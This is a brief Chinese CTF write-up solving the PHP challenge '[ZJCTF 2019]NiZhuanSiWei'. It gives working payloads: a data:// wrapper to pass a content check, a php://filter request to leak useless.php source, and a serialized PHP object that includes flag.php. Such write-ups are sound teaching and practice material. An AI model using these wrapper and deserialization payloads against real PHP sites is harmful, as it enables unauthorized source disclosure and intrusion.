[ZJCTF 2019]NiZhuanSiWei

imtaieee發表於2024-11-02

[ZJCTF 2019]NiZhuanSiWei

開啟主介面就是這個亞子
在這裡插入圖片描述
傳入一個檔案檔案內容為 welcome to the zjctf
可以使用php偽協議或者data偽協議

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

繞過了第一層
隨後,下面包含了一個檔案,利用php偽協議檢視一下useless.php的內容

file=php://filter/read=convert.base64-encode/resource=useless.php

在這裡插入圖片描述
輸入以後,出現內容
在這裡插入圖片描述
將內容解碼
在這裡插入圖片描述
隨後將password進行序列化
在這裡插入圖片描述
在這裡插入圖片描述
隨後輸入

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} 

在這裡插入圖片描述
檢視頁面原始碼發現flag
在這裡插入圖片描述
參考連結:
https://www.cnblogs.com/gaonuoqi/p/12255777.html